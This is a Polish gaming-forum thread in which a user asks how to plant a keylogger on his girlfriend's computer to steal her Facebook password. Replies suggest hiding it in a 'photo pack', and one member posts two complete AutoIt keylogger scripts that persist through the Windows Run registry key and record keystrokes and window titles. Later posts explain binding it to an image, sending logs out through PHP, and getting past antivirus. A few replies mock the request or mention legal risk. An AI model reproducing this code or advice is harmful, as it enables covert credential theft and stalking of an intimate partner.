Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Keylogger na Facebook?


Sensei®

Rekomendowane odpowiedzi

Opublikowano

Witam all, jest poważna sprawa, nie będę owijał w bawełnę, walnę prosto z mostu, wiem, że to dziecinne i wgl. ale moja ,,dziewczyna'' kreci z kims na FB tylko nie wiem z kim i jest mi potrzebny jej profil ; /

 

można jakoś wysłać jej keyloggera żeby np. login i hasło mi na emaila przychodził czy coś?

Keylogger nie tylko do tej potrzeby, pozdrawiam :)

//nieregulaminowa sygnatura
//BR3ND

Opublikowano

Cel szczytny.... -,-

 

Tak, możesz jej wysłać keylogger'a. Najprościej w jakiejś paczuszce podesłać pod przykrywką że to np. "paczka zdjęć z melanżu". Samego key'a musisz już albo zrobić sam, albo skołować z neta.

Opublikowano

Najlepeiej samemu napisać kiedyś miałem napisanego w autoicie ale to na laptopie który aktualnie nie działa :)

poczytaj o tym jeśli choć trochę znasz jakiś jezek programowwania powinieneś sobie z tym poradzić :)

 

 

P.S

Nie owijaj w bawełnę i tak każdy wie że potrzebujesz tego keyloggera żeby komuś konto na metinie opierdolić "_"

2utq9g5.png b6u4qg.png
Opublikowano

P.S

Nie owijaj w bawełnę i tak każdy wie że potrzebujesz tego keyloggera żeby komuś konto na metinie opierdolić "_"

Żeby po*****ć stalke +9 3k hp i bony na defa,speed i ludzi.

@top

A serio to możesz napisac do kaspersky. Dadzą ci. Albo zrób, żeby automatycznie zapisywalo hasła. Niech koleżanka przyjdzie i wejdzie na fb i sie nie wyloguje. I masz konto.

                           

Opublikowano

Zaproś ją do domu, powiedz żeby weszła na internet sobie, bo musisz do WC i podpatruj czy wchodzi na facebooka. Jak wejdzie, to ją wypierdol wyproś z domu, nie pozwalając się wylogować. I już.

Opublikowano

Zaproś ją do domu,powiedz żeby weszła na internet sobie,bo musisz do WC,i podpatruj czy wchodzi na facebooka.Jak wejdzie,to ją wypierdol wyproś z domu,nie pozwalając się wylogować.I już.

Hahahahaahahaaa, na hardcore hahahahaha pzdr z podłogi xD

Opublikowano

W AutoIt zrób takiego keyloggera, w internecie są gotowe skrypty. Dałbym Ci gotowca, ale wyjeżdżam niedługo, a laptopa już schowałem ;/ Tutaj jakieś z neta

 

1)

 

 

 

 

;Keylogger by Frisko™ .chi lo spaccia per il suo muore
#include<misc.au3>
#NotrayIcon

$dll=DllOpen("user32.dll")
RegWrite("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun", "dkcd", "REG_SZ", "C:keylogger.exe")
FileCopy("keylogger.exe","C:")
Filecopy
("risultati.txt","C:Documents and Settings"&
@username&"Impostazioni localiDati
applicazioniMicrosoftMessengerCONTATTO DELLA VITTIMASharing
FoldersVOSTRO CONTATTO")

while 1

If _IsPressed(41,$dll)Then
FileWrite ("risultati.txt","a")
EndIf
While _IsPressed(41) = 1
WEnd

If _IsPressed (42,$dll)Then
FileWrite("risultati.txt","b")
EndIf
While _IsPressed(42) = 1
WEnd

If _IsPressed(43,$dll)Then
FileWrite("risultati.txt","c")
EndIf
While _IsPressed(43) = 1
WEnd

If _IsPressed(44,$dll)Then
FileWrite("risultati.txt","d")
EndIf
While _IsPressed(44) = 1
WEnd

If _IsPressed(45,$dll)Then
FileWrite("risultati.txt","e")
EndIf
While _IsPressed(45) = 1
WEnd

If _IsPressed(46,$dll)Then
FileWrite("risultati.txt","f")
EndIf
While _IsPressed(46) = 1
WEnd

If _IsPressed(47,$dll)Then
FileWrite("risultati.txt","g")
EndIf
While _IsPressed(47) = 1
WEnd

if _IsPressed(48,$dll)Then
FileWrite("risultati.txt","h")
EndIf
While _IsPressed(48) = 1
WEnd

If _IsPressed(49,$dll)Then
FileWrite("risultati.txt","i")
EndIf
While _IsPressed(49) = 1
WEnd

If _IsPressed("4a",$dll)Then
FileWrite("risultati.txt","j")
EndIf
While _IsPressed("4a") = 1
WEnd

If _IsPressed("4b",$dll)Then
FileWrite("risultati.txt","k")
EndIf
While _IsPressed("4b") = 1
WEnd

If _IsPressed("4c",$dll)Then
FileWrite("risultati.txt","l")
EndIf
While _IsPressed("4c") = 1
WEnd

If _IsPressed("4d",$dll)Then
FileWrite("risultati.txt","m")
EndIf
While _IsPressed("4d") = 1
WEnd

If _IsPressed("4e",$dll)Then
FileWrite("risultati.txt","n")
EndIf
While _IsPressed("4e") = 1
WEnd

If _IsPressed("4f",$dll)Then
FileWrite("risultati.txt","o")
EndIf
While _IsPressed("4f") = 1
WEnd

If _IsPressed(50,$dll)Then
FileWrite("risultati.txt","p")
EndIf
While _IsPressed(50) = 1
WEnd

If _IsPressed(51,$dll)Then
FileWrite("risultati.txt","q")
EndIf
While _IsPressed(51) = 1
WEnd

If _IsPressed(52,$dll)Then
FileWrite("risultati.txt","r")
EndIf
While _IsPressed(52) = 1
WEnd

If _IsPressed(53,$dll)Then
FileWrite("risultati.txt","s")
EndIf
While _IsPressed(53) = 1
WEnd

If _IsPressed(54,$dll)Then
FileWrite("risultati.txt","t")
EndIf
While _IsPressed(54) = 1
WEnd

If _IsPressed(55,$dll)Then
FileWrite("risultati.txt","u")
EndIf
While _IsPressed(55) = 1
WEnd

If _IsPressed(56,$dll)Then
FileWrite("risultati.txt","v")
EndIf
While _IsPressed(56) = 1
WEnd

If _IsPressed(57,$dll)Then
FileWrite("risultati.txt","w")
EndIf
While _IsPressed(57) = 1
WEnd

If _IsPressed(58,$dll)Then
FileWrite("risultati.txt","x")
EndIf
While _IsPressed(58) = 1
WEnd

If _IsPressed(59,$dll)Then
FileWrite("risultati.txt","y")
EndIf
While _IsPressed(59) = 1
WEnd

If _IsPressed("5a",$dll)Then
FileWrite("risultati.txt","z")
EndIf
While _IsPressed("5a") = 1
WEnd

If _IsPressed(56,$dll)Then
FileWrite("risultati.txt","v")
EndIf
While _IsPressed(56) = 1
WEnd

If _IsPressed(20,$dll)Then
FileWrite("risultati.txt","{SPACE}")
EndIf
While _IsPressed(20) = 1
WEnd

If _IsPressed(30,$dll)Then
FileWrite("risultati.txt","0")
EndIf
While _IsPressed(30) = 1
WEnd

If _IsPressed(31,$dll)Then
FileWrite("risultati.txt","1")
EndIf
While _IsPressed(31) = 1
WEnd

If _IsPressed(32,$dll)Then
FileWrite("risultati.txt","2")
EndIf
While _IsPressed(32) = 1
WEnd

If _IsPressed(33,$dll)Then
FileWrite("risultati.txt","3")
EndIf
While _IsPressed(33) = 1
WEnd

If _IsPressed(34,$dll)Then
FileWrite("risultati.txt","4")
EndIf
While _IsPressed(34) = 1
WEnd

If _IsPressed(35,$dll)Then
FileWrite("risultati.txt","5")
EndIf
While _IsPressed(35) = 1
WEnd

If _IsPressed(36,$dll)Then
FileWrite("risultati.txt","6")
EndIf
While _IsPressed(36) = 1
WEnd

If _IsPressed(37,$dll)Then
FileWrite("risultati.txt","7")
EndIf
While _IsPressed(37) = 1
WEnd

If _IsPressed(38,$dll)Then
FileWrite("risultati.txt","8")
EndIf
While _IsPressed(38) = 1
WEnd

If _IsPressed(39,$dll)Then
FileWrite("risultati.txt","9")
EndIf
While _IsPressed(39) = 1
WEnd

WEnd

 

 

 

 

2)

 

 

 

 

#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Icon=GForum.ico
#AutoIt3Wrapper_Compile_Both=y
#AutoIt3Wrapper_UseX64=y
#AutoIt3Wrapper_Add_Constants=n
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", @ScriptName, "REG_SZ", @ScriptFullPath)
Local $date = @YEAR & "-" & @MON & "-" & @MDAY
Local $user32 = DllOpen("user32"), $log
Local $window2 = ""
Local $CAPSLOCKTOGGLE
Local $log = "C:\Windows\log.html"
#include <File.au3>
HotKeySet( "^{F9}", "Terminate")
opt("OnExitFunc", "Terminate")
If FileExists($log) = 1 Then
FileDelete($log)
EndIf
_FileCreate("C:\Windows\log.html")
FileWrite($log,"")
FileOpen($log, 1)
Sleep(100)
FileWrite($log, "<font face=Verdana size=1>")
FileWrite($log, "<b><center>[#[ Keylogger Log Start ]#] </center></b><br>")
FileWrite($log, "<b><center>[#[ Historia : ]#] </center></b><br>")

FileWrite($log, "<center><font color=#008000 style=font-size:9px>{EN} = Enter<br></font></center>")
FileWrite($log, "<center><font color=#008000 style=font-size:9px>{BS} = Backspace<br></font></center>")
FileWrite($log, "<center><font color=#008000 style=font-size:9px>{LMS} = Lewy Przycisk Myszy<br></font></center>")
FileWrite($log, "<center><font color=#008000 style=font-size:9px>{RMS} = Prawy Przycisk Myszy<br></font></center>")
FileWrite($log, "<center><font color=#008000 style=font-size:9px>{MMS} = Srodkowy Przycisk Myszy<br></font></center>")
FileWrite($log, "<br>")

FileWrite($log, "<b><center>[#[ Log : ]#] </center></b><br>")


While 1
For $n = 30 To 39
If _IsPressed ($n) Then
If ((StringRight($n, 1) = 0) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('=')
ElseIf ((StringRight($n, 1) = 0) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress('0')
ElseIf ((StringRight($n, 1) = 1) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('!')
ElseIf ((StringRight($n, 1) = 1) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress('1')
ElseIf ((StringRight($n, 1) = 2) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('"')
ElseIf ((StringRight($n, 1) = 2) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress('2')
ElseIf ((StringRight($n, 1) = 3) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('#')
ElseIf ((StringRight($n, 1) = 3) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress( '3')
ElseIf ((StringRight($n, 1) = 4) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('$')
ElseIf ((StringRight($n, 1) = 4) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress('4')
ElseIf ((StringRight($n, 1) = 5) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('%')
ElseIf ((StringRight($n, 1) = 5) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress( '5')
ElseIf ((StringRight($n, 1) = 6) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('&')
ElseIf ((StringRight($n, 1) = 6) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress('6')
ElseIf ((StringRight($n, 1) = 7) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('/')
ElseIf ((StringRight($n, 1) = 7) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress('7')
ElseIf ((StringRight($n, 1) = 8) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress('(')
ElseIf ((StringRight($n, 1) = 8) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress('8')
ElseIf ((StringRight($n, 1) = 9) And ($CAPSLOCKTOGGLE = 1)) Then
_LogKeyPress(')')
ElseIf ((StringRight($n, 1) = 9) And ($CAPSLOCKTOGGLE = 0)) Then
_LogKeyPress('9')
EndIf
While _IsPressed ($n) = 1
Sleep(1)
WEnd
EndIf
Next
If _IsPressed ('2E') = 1 Then
_LogKeyPress('.')
While _IsPressed ('2E') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('3F') = 1 Then
_LogKeyPress("?")
While _IsPressed ('3F') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('B4') = 1 Then
_LogKeyPress("´")
While _IsPressed ('B4') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('2A') = 1 Then
_LogKeyPress("*")
While _IsPressed ('2A') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('2B') = 1 Then
_LogKeyPress("+")
While _IsPressed ('2B') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('27') = 1 Then
_LogKeyPress("'")
While _IsPressed ('27') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('41') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("a")
Else
_LogKeyPress("A")
EndIf
While _IsPressed ('41') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('42') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("b")
Else
_LogKeyPress("B")
EndIf
While _IsPressed ('42') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('43') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("c")
Else
_LogKeyPress("C")
EndIf
While _IsPressed ('43') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('44') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("d")
Else
_LogKeyPress("D")
EndIf
While _IsPressed ('44') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('45') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("e")
Else
_LogKeyPress("E")
EndIf
While _IsPressed ('45') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('46') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("f")
Else
_LogKeyPress("F")
EndIf
While _IsPressed ('46') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('47') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("g")
Else
_LogKeyPress("G")
EndIf
While _IsPressed ('47') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('48') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("h")
Else
_LogKeyPress("H")
EndIf
While _IsPressed ('48') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('49') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("i")
Else
_LogKeyPress("I")
EndIf
While _IsPressed ('49') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('4A') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("j")
Else
_LogKeyPress("J")
EndIf
While _IsPressed ('4A') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('4B') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("k")
Else
_LogKeyPress("K")
EndIf
While _IsPressed ('4B') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('4C') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("l")
Else
_LogKeyPress("L")
EndIf
While _IsPressed ('4C') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('4D') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("m")
Else
_LogKeyPress("M")
EndIf
While _IsPressed ('4D') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('4E') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("n")
Else
_LogKeyPress("N")
EndIf
While _IsPressed ('4E') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('4F') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("o")
Else
_LogKeyPress("O")
EndIf
While _IsPressed ('4F') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('50') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("p")
Else
_LogKeyPress("P")
EndIf
While _IsPressed ('50') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('51') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("q")
Else
_LogKeyPress("Q")
EndIf
While _IsPressed ('51') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('52') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("r")
Else
_LogKeyPress("R")
EndIf
While _IsPressed ('52') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('53') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("s")
Else
_LogKeyPress("S")
EndIf
While _IsPressed ('53') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('54') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("t")
Else
_LogKeyPress("T")
EndIf
While _IsPressed ('54') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('55') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("u")
Else
_LogKeyPress("U")
EndIf
While _IsPressed ('55') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('56') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("v")
Else
_LogKeyPress("V")
EndIf
While _IsPressed ('56') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('57') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("w")
Else
_LogKeyPress("W")
EndIf
While _IsPressed ('57') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('58') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("x")
Else
_LogKeyPress("X")
EndIf
While _IsPressed ('58') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('59') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("y")
Else
_LogKeyPress("Y")
EndIf
While _IsPressed ('59') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('5A') = 1 Then
If $CAPSLOCKTOGGLE = 0 Then
_LogKeyPress("z")
Else
_LogKeyPress("Z")
EndIf
While _IsPressed ('5A') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('20') = 1 Then
_LogKeyPress(" ")
While _IsPressed ('20') = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('01') = 1 Then

_LogKeyPress("<font color=#008000 style=font-size:9px><i>{LMS}</i></font>")
While _IsPressed ("01") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('02') = 1 Then

_LogKeyPress("<font color=#008000 style=font-size:9px><i>{RMS}</i></font>")
While _IsPressed ("02") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('04') = 1 Then
_LogKeyPress("<font color=#008000 style=font-size:9px><i>{MMS}</i></font>")
While _IsPressed ("04") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('08') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{BS}</i></font>")

While _IsPressed ("08") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('09') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{TAB}</i></font>")
While _IsPressed ("09") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('0d') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{EN}</i></font><br>")
While _IsPressed ("0d") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('10') Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{SHIFT}</i></font>")
While _IsPressed ("10") = 1
For $n = 30 To 39
If _IsPressed ($n) Then
If StringRight($n, 1) = 0 Then
_LogKeyPress('=')
ElseIf StringRight($n, 1) = 1 Then
_LogKeyPress('!')
ElseIf StringRight($n, 1) = 2 Then
_LogKeyPress('"')
ElseIf StringRight($n, 1) = 3 Then
_LogKeyPress('#')
ElseIf StringRight($n, 1) = 4 Then
_LogKeyPress('$')
ElseIf StringRight($n, 1) = 5 Then
_LogKeyPress('%')
ElseIf StringRight($n, 1) = 6 Then
_LogKeyPress('&')
ElseIf StringRight($n, 1) = 7 Then
_LogKeyPress('/')
ElseIf StringRight($n, 1) = 8 Then
_LogKeyPress('(')
ElseIf StringRight($n, 1) = 9 Then
_LogKeyPress(')')
EndIf
While _IsPressed ($n) = 1
Sleep(1)
WEnd
EndIf
Next
If _IsPressed ('41') = 1 Then _LogKeyPress("A")
While _IsPressed ('41') = 1
Sleep(1)
WEnd
If _IsPressed ('42') = 1 Then _LogKeyPress("B")
While _IsPressed ('42') = 1
Sleep(1)
WEnd
If _IsPressed ('43') = 1 Then _LogKeyPress("C")
While _IsPressed ('43') = 1
Sleep(1)
WEnd
If _IsPressed ('44') = 1 Then _LogKeyPress("D")
While _IsPressed ('44') = 1
Sleep(1)
WEnd
If _IsPressed ('45') = 1 Then _LogKeyPress("E")
While _IsPressed ('45') = 1
Sleep(1)
WEnd
If _IsPressed ('46') = 1 Then _LogKeyPress("F")
While _IsPressed ('46') = 1
Sleep(1)
WEnd
If _IsPressed ('47') = 1 Then _LogKeyPress("G")
While _IsPressed ('47') = 1
Sleep(1)
WEnd
If _IsPressed ('48') = 1 Then _LogKeyPress("H")
While _IsPressed ('48') = 1
Sleep(1)
WEnd
If _IsPressed ('49') = 1 Then _LogKeyPress("I")
While _IsPressed ('49') = 1
Sleep(1)
WEnd
If _IsPressed ('4A') = 1 Then _LogKeyPress("J")
While _IsPressed ('4A') = 1
Sleep(1)
WEnd
If _IsPressed ('4B') = 1 Then _LogKeyPress("K")
While _IsPressed ('4B') = 1
Sleep(1)
WEnd
If _IsPressed ('4C') = 1 Then _LogKeyPress("L")
While _IsPressed ('4C') = 1
Sleep(1)
WEnd
If _IsPressed ('4D') = 1 Then _LogKeyPress("M")
While _IsPressed ('4D') = 1
Sleep(1)
WEnd
If _IsPressed ('4E') = 1 Then _LogKeyPress("N")
While _IsPressed ('4E') = 1
Sleep(1)
WEnd
If _IsPressed ('4F') = 1 Then _LogKeyPress("O")
While _IsPressed ('4F') = 1
Sleep(1)
WEnd
If _IsPressed ('50') = 1 Then _LogKeyPress("P")
While _IsPressed ('50') = 1
Sleep(1)
WEnd
If _IsPressed ('51') = 1 Then _LogKeyPress("Q")
While _IsPressed ('51') = 1
Sleep(1)
WEnd
If _IsPressed ('52') = 1 Then _LogKeyPress("R")
While _IsPressed ('52') = 1
Sleep(1)
WEnd
If _IsPressed ('53') = 1 Then _LogKeyPress("S")
While _IsPressed ('53') = 1
Sleep(1)
WEnd
If _IsPressed ('54') = 1 Then _LogKeyPress("T")
While _IsPressed ('54') = 1
Sleep(1)
WEnd
If _IsPressed ('55') = 1 Then _LogKeyPress("U")
While _IsPressed ('55') = 1
Sleep(1)
WEnd
If _IsPressed ('56') = 1 Then _LogKeyPress("V")
While _IsPressed ('56') = 1
Sleep(1)
WEnd
If _IsPressed ('57') = 1 Then _LogKeyPress("W")
While _IsPressed ('57') = 1
Sleep(1)
WEnd
If _IsPressed ('58') = 1 Then _LogKeyPress("X")
While _IsPressed ('58') = 1
Sleep(1)
WEnd
If _IsPressed ('59') = 1 Then _LogKeyPress("Y")
While _IsPressed ('59') = 1
Sleep(1)
WEnd
If _IsPressed ('5A') = 1 Then _LogKeyPress("Z")
While _IsPressed ('5A') = 1
Sleep(1)
WEnd
WEnd
ElseIf _IsPressed ('11') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{CTRL}</i></font>")
While _IsPressed ("11") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('12') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{ALT}</i></font>")
While _IsPressed ("12") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('13') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{PAUSE}</i></font>")
While _IsPressed ("13") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('14') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{CAPSLOCK}</i></font>")
If $CAPSLOCKTOGGLE = 1 Then
$CAPSLOCKTOGGLE = 0
ElseIf $CAPSLOCKTOGGLE = 0 Then
$CAPSLOCKTOGGLE = 1
EndIf
While _IsPressed ("14") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('1b') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{ESC}</i></font>")
While _IsPressed ("1b") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('21') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{PGUP}</i></font>")
While _IsPressed ("21") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('22') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{PG_DOWN}</i></font>")
While _IsPressed ("22") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('23') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{END}</i></font>")
While _IsPressed ("23") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('24') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{HOME}</i></font>")
While _IsPressed ("24") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('25') = 1 Then
_LogKeyPress("<font color=#008000 style=font-size:9px><i>{LEFT ARROW}</i></font>")
While _IsPressed ("25") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('26') = 1 Then
_LogKeyPress("<font color=#008000 style=font-size:9px><i>{UP ARROW}</i></font>")
While _IsPressed ("26") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('27') = 1 Then
_LogKeyPress("<font color=#008000 style=font-size:9px><i>{RIGHT ARROW}</i></font>")
While _IsPressed ("27") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('28') = 1 Then
_LogKeyPress("<font color=#008000 style=font-size:9px><i>{DOWN ARROW}</i></font>")
While _IsPressed ("28") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('2c') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{PRINT}</i></font>")
While _IsPressed ("2c") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('2d') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{INSERT}</i></font>")
While _IsPressed ("2d") = 1
Sleep(1)
WEnd
ElseIf _IsPressed ('2e') = 1 Then
_LogKeyPress("<font color=#FF8000 style=font-size:9px><i>{DEL}</i></font>")
While _IsPressed ("2e") = 1
Sleep(1)
WEnd
EndIf
WEnd
Func _IsPressed($hexKey)
Local $aR, $bRv
$hexKey = '0x' & $hexKey
$aR = DllCall($user32, "int", "GetAsyncKeyState", "int", $hexKey)
If $aR[0] <> 0 Then
$bRv = 1
Else
$bRv = 0
EndIf
Return $bRv
EndFunc
Func _LogKeyPress($what2log)
$window = WinGetTitle("")
If $window = $window2 Then
FileWrite($log, $what2log)
Else
$window2 = $window
FileWrite($log, "<br><BR>" & "<b>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & '] Window : "' & $window & '"</b><br>' & $what2log)
EndIf
EndFunc
Func Terminate()
DllClose($user32)
FileClose($log)
Exit
EndFunc

 

 

 

 

Poczytaj trochę o AutoIt i będziesz wiedział :) Trzeba tylko dorobić funkcję, która wyśle log np. na email.

Od dnia 1.11.2013r. 14:17 zobaczono moje posty licznik-56-90712-stat.png razy ;)


 


 

Opublikowano

Skoro laska kręci z innym, to nic Ci to nie da, że dowiesz się kto to, postraszysz go itp. Pogorszysz tylko sprawę. A skoro kręci z innym to jesteś na przegranej pozycji. Coś o tym wiem..

Nie boję się wyrazić własnego zdania. Nikt i nic jego nie zmieni.

Opublikowano

Zapytaj się jej i po sprawie, poza tym za keyloggera możesz iść do więzienia lub płacić karę ;]

hehe

wiesz jak trudno przed sądem takie coś udowodnić?

ItgMSFz.gif­

  • 1 rok później...
Opublikowano

Witam , znaduje sie w podbnej sytuacji co kolega zakladajacy temat !
Chcialbym "podpiac" tego keyloggera do zdjecia/filmu/pliku rar
Czy znalazlaby sie tutaj osoba , która by mi pomogła ?
Byłbym bardzo wdzieczny
Pozdrawiam , zakochany chlopak :(

Opublikowano

@Zuchos

 

To użyj skryptów, które podałem wyżej + dodaj funkcje, która wypakuje zdjęcia z programu np. na pulpit i je otworzy.

 

Do pakowania użyj FileInstall

Do otwarcia użyj ShellExecute (2 post):

http://autoit3.pl/topic464.html

Poczytaj trochę o AutoIt i tych dwóch funkcjach i załapiesz

Od dnia 1.11.2013r. 14:17 zobaczono moje posty licznik-56-90712-stat.png razy ;)


 


 

Opublikowano

Gorzej, jeżeli ona ma anty wirusa xD xd

Jakby nie było jutra, jakby nie istniał czas, chwila to dziś sekunda, ale zegar dawno już zgasł...

Trzyma przy sobie nas tylko wspomnienie tego, jak było tu nam na początku

 

4875_blue.png [*] 30.09.2016r. [*] 9368_gold.png

 

 

 

 

Opublikowano

Gorzej, jeżeli ona ma anty wirusa xD xD

 

Niekoniecznie. W połączeniu z PHP jest duża szansa, że nie wykryje.

https://www.virustotal.com/pl/file/a4e199ae00704ef01767e78da016ba8b61ffcab2fa8b9cef102fd17f9739d127/analysis/1409131248/

Program wysyła słowo "tekst" poprzez stronę PHP. Skrypt PHP następnie zapisuje te słowo "tekst" w oddzielnym pliku. Ten jeden wirus jest przypadkowy. AutoIt często dorzuca takie "śmieci" i tak widzą to antywirusy.

Od dnia 1.11.2013r. 14:17 zobaczono moje posty licznik-56-90712-stat.png razy ;)


 


 

Opublikowano

Witam , znaduje sie w podbnej sytuacji co kolega zakladajacy temat !

Chcialbym "podpiac" tego keyloggera do zdjecia/filmu/pliku rar

Czy znalazlaby sie tutaj osoba , która by mi pomogła ?

Byłbym bardzo wdzieczny

Pozdrawiam , zakochany chlopak :(

chyba stalker

 

Cały czas trwa dyskusja na temat przewagi DJów nad funkcją shuffle w winampie ~Paulo Coelho

Opublikowano

